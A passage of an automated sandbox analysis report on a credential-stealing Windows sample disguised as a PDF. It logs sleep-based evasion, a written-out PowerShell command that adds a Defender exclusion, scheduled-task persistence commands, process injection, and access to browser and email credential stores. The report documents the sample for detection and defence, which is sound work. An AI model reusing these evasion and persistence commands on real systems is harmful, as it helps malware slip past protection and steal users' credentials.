                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -593812s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 7908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -27670116110564310s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599891s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599782s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599657s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599532s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599407s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599297s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599188s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598938s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598829s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598594s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598356s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598228s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598110s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597910s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597766s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597652s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597438s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597329s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596829s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596579s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596454s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596329s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595829s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595579s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595454s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595329s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594829s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594579s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594454s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594329s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -593954s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599812Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599686Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599575Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599467Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599250Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599140Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599031Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598922Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598812Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598703Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598593Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598484Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598363Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598243Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596970Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596727Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596614Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596264Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595608Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595172Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594953Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594843Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594509Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594278Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594160Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594041Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 593812Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 922337203685477
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4149391535.0000000000EF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<5l
                  Source: teXfNv.exe, 0000000B.00000002.4149232690.0000000000D67000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe"
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Memory written: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe Memory written: C:\Users\user\AppData\Roaming\teXfNv.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp"
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Process created: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp"
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe Process created: C:\Users\user\AppData\Roaming\teXfNv.exe "C:\Users\user\AppData\Roaming\teXfNv.exe"
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Queries volume information: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe VolumeInformation
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7656, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: teXfNv.exe PID: 8008, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara match File source: 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  Source: Yara match File source: 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7656, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: teXfNv.exe PID: 8008, type: MEMORYSTR
                  | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                  |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                  | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                  | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                  | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
